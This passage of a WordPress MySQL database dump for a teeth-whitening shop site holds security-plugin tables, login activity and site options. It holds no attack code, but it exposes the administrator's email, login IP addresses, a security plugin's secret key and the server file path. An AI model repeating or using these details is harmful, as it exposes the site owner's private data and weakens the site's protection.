`login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`logout_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`login_ip` varchar(100) NOT NULL DEFAULT '',
`login_country` varchar(150) NOT NULL DEFAULT '',
`browser_type` varchar(150) NOT NULL DEFAULT '',
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_aiowps_login_activity`
--
LOCK TABLES `wp_aiowps_login_activity` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_login_activity` DISABLE KEYS */;
INSERT INTO `wp_aiowps_login_activity` VALUES (1,1,'admin','2021-07-20 07:38:39','1000-10-10 10:00:00','185.175.113.72','',''),(2,1,'admin','2021-08-23 22:12:56','1000-10-10 10:00:00','103.70.171.69','',''),(3,1,'admin','2022-09-10 04:12:28','1000-10-10 10:00:00','149.34.244.165','',''),(4,2,'xmlrpc','2022-09-10 04:13:59','2022-09-10 04:14:36','149.34.244.165','','');
/*!40000 ALTER TABLE `wp_aiowps_login_activity` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_aiowps_login_lockdown`
--
DROP TABLE IF EXISTS `wp_aiowps_login_lockdown`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_login_lockdown` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) NOT NULL,
`user_login` varchar(150) NOT NULL,
`lockdown_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`release_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`failed_login_ip` varchar(100) NOT NULL DEFAULT '',
`lock_reason` varchar(128) NOT NULL DEFAULT '',
`unlock_key` varchar(128) NOT NULL DEFAULT '',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_aiowps_login_lockdown`
--
LOCK TABLES `wp_aiowps_login_lockdown` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_aiowps_permanent_block`
--
DROP TABLE IF EXISTS `wp_aiowps_permanent_block`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_permanent_block` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`blocked_ip` varchar(100) NOT NULL DEFAULT '',
`block_reason` varchar(128) NOT NULL DEFAULT '',
`country_origin` varchar(50) NOT NULL DEFAULT '',
`blocked_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`unblock` tinyint(1) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_aiowps_permanent_block`
--
LOCK TABLES `wp_aiowps_permanent_block` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_cerber_files`
--
DROP TABLE IF EXISTS `wp_cerber_files`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_files` (
`scan_id` int(10) unsigned NOT NULL,
`scan_type` int(10) unsigned NOT NULL DEFAULT 1,
`scan_mode` int(10) unsigned NOT NULL DEFAULT 0,
`scan_status` int(10) unsigned NOT NULL DEFAULT 0,
`file_status` int(10) unsigned NOT NULL DEFAULT 0,
`file_name_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`file_name` text NOT NULL,
`file_type` int(10) unsigned NOT NULL DEFAULT 0,
`file_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`file_md5` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`file_hash_repo` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`hash_match` int(10) unsigned NOT NULL DEFAULT 0,
`file_size` bigint(20) unsigned NOT NULL DEFAULT 0,
`file_perms` int(11) NOT NULL DEFAULT 0,
`file_writable` int(10) unsigned NOT NULL DEFAULT 0,
`file_mtime` int(10) unsigned NOT NULL DEFAULT 0,
`file_ext` varchar(255) NOT NULL DEFAULT '',
`extra` text NOT NULL,
PRIMARY KEY (`scan_id`,`file_name_hash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_cerber_files`
--
LOCK TABLES `wp_cerber_files` WRITE;
/*!40000 ALTER TABLE `wp_cerber_files` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_cerber_files` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_cerber_sets`
--
DROP TABLE IF EXISTS `wp_cerber_sets`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_sets` (
`the_key` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`the_id` bigint(20) NOT NULL DEFAULT 0,
`the_value` longtext NOT NULL,
`expires` bigint(20) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`the_key`,`the_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_cerber_sets`
--
LOCK TABLES `wp_cerber_sets` WRITE;
/*!40000 ALTER TABLE `wp_cerber_sets` DISABLE KEYS */;
INSERT INTO `wp_cerber_sets` VALUES ('admin_message',0,'a:0:{}',0),('admin_notice',0,'a:0:{}',0),('boot_cerber_addons',0,'a:0:{}',0),('cerber_admin_wide',0,'<h2>WP Cerber is now active and has started protecting your site</h2><p style=\"font-size:130%;\"><a href=\"https://wpcerber.com/getting-started/\" target=\"_blank\">Getting Started Guide</a></p><div id=\"crb-activation-msg\"><p> <i class=\"crb-icon crb-icon-bx-layer\"></i> <a href=\"https://teethwhiteningproduct.co.uk/wp-admin/admin.php?page=cerber-tools&tab=imex\">Import settings</a> <i class=\"crb-icon dashicons-before dashicons-twitter\"></i> <a target=\"_blank\" href=\"https://twitter.com/wpcerber\">Follow Cerber on Twitter</a> <i class=\"crb-icon dashicons-before dashicons-email-alt\"></i> <a target=\"_blank\" href=\"https://wpcerber.com/subscribe-newsletter/\">Subscribe to Cerber\'s newsletter</a></p></div>',0),('garbage_collector',0,'1624622944',0),('refresh_add_on_list',0,'1',0),('_background_tasks',0,'a:2:{s:40:\"d5e690918740ad0fcf9adc87b81a1182c28dc8ed\";a:1:{s:4:\"func\";s:23:\"cerber_upgrade_deferred\";}s:40:\"6416419de0f97d0692e8cd7b74a80ad1c6217f10\";a:1:{s:4:\"func\";s:21:\"crb_sessions_sync_all\";}}',0),('_cerberkey_',0,'a:3:{i:0;s:32:\"11a4134c7698f25cb4e48ca53cbab08a\";i:1;i:1624622945;i:4;s:40:\"SK//C023SQ5XUA6DWVLMHYRIET4ZJ189GFOBKPN7\";}',0);
/*!40000 ALTER TABLE `wp_cerber_sets` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_cerber_uss`
--
DROP TABLE IF EXISTS `wp_cerber_uss`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_uss` (
`user_id` bigint(20) unsigned NOT NULL,
`ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`started` int(10) unsigned NOT NULL,
`expires` int(10) unsigned NOT NULL,
`session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`wp_session_token` varchar(250) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_cerber_uss`
--
LOCK TABLES `wp_cerber_uss` WRITE;
/*!40000 ALTER TABLE `wp_cerber_uss` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_cerber_uss` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_commentmeta`
--
DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_commentmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `comment_id` (`comment_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_commentmeta`
--
LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_comments`
--
DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_comments` (
`comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
`comment_author` tinytext NOT NULL,
`comment_author_email` varchar(100) NOT NULL DEFAULT '',
`comment_author_url` varchar(200) NOT NULL DEFAULT '',
`comment_author_IP` varchar(100) NOT NULL DEFAULT '',
`comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_content` text NOT NULL,
`comment_karma` int(11) NOT NULL DEFAULT 0,
`comment_approved` varchar(20) NOT NULL DEFAULT '1',
`comment_agent` varchar(255) NOT NULL DEFAULT '',
`comment_type` varchar(20) NOT NULL DEFAULT 'comment',
`comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`comment_ID`),
KEY `comment_post_ID` (`comment_post_ID`),
KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
KEY `comment_date_gmt` (`comment_date_gmt`),
KEY `comment_parent` (`comment_parent`),
KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_comments`
--
LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_links`
--
DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_links` (
`link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`link_url` varchar(255) NOT NULL DEFAULT '',
`link_name` varchar(255) NOT NULL DEFAULT '',
`link_image` varchar(255) NOT NULL DEFAULT '',
`link_target` varchar(25) NOT NULL DEFAULT '',
`link_description` varchar(255) NOT NULL DEFAULT '',
`link_visible` varchar(20) NOT NULL DEFAULT 'Y',
`link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
`link_rating` int(11) NOT NULL DEFAULT 0,
`link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`link_rel` varchar(255) NOT NULL DEFAULT '',
`link_notes` mediumtext NOT NULL,
`link_rss` varchar(255) NOT NULL DEFAULT '',
PRIMARY KEY (`link_id`),
KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_links`
--
LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_options`
--
DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_options` (
`option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`option_name` varchar(191) NOT NULL DEFAULT '',
`option_value` longtext NOT NULL,
`autoload` varchar(20) NOT NULL DEFAULT 'yes',
PRIMARY KEY (`option_id`),
UNIQUE KEY `option_name` (`option_name`),
KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=132711 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_options`
--
LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES (1,'siteurl','https://teethwhiteningproduct.co.uk','yes'),(2,'home','https://teethwhiteningproduct.co.uk','yes'),(3,'blogname','Teeth Whitening','yes'),(4,'blogdescription','Brighter, whiter smiles','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','bensykes@bensykes.co.uk','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','','yes'),(11,'comments_notify','','no'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','closed','yes'),(20,'default_ping_status','closed','yes'),(21,'default_pingback_flag','','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','H:i','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','','yes'),(27,'moderation_notify','','yes'),(28,'permalink_structure','/%postname%','yes'),(29,'rewrite_rules','a:111:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:40:\"vc_grid_item/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:50:\"vc_grid_item/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:70:\"vc_grid_item/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"vc_grid_item/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"vc_grid_item/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:46:\"vc_grid_item/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:29:\"vc_grid_item/([^/]+)/embed/?$\";s:45:\"index.php?vc_grid_item=$matches[1]&embed=true\";s:33:\"vc_grid_item/([^/]+)/trackback/?$\";s:39:\"index.php?vc_grid_item=$matches[1]&tb=1\";s:41:\"vc_grid_item/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?vc_grid_item=$matches[1]&paged=$matches[2]\";s:48:\"vc_grid_item/([^/]+)/comment-page-([0-9]{1,})/?$\";s:52:\"index.php?vc_grid_item=$matches[1]&cpage=$matches[2]\";s:37:\"vc_grid_item/([^/]+)(?:/([0-9]+))?/?$\";s:51:\"index.php?vc_grid_item=$matches[1]&page=$matches[2]\";s:29:\"vc_grid_item/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:39:\"vc_grid_item/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:59:\"vc_grid_item/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"vc_grid_item/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"vc_grid_item/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:35:\"vc_grid_item/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:39:\"index.php?&page_id=20&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','a:2:{i:0;s:89:\"/home/teethwhiteningproduct.co.uk/public_html/wp-content/themes/twentyseventeen/style.css\";i:1;s:0:\"\";}','no'),(44,'comment_registration','','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','49752','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','page','yes'),(54,'tag_base','','yes'),(55,'show_avatars','','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'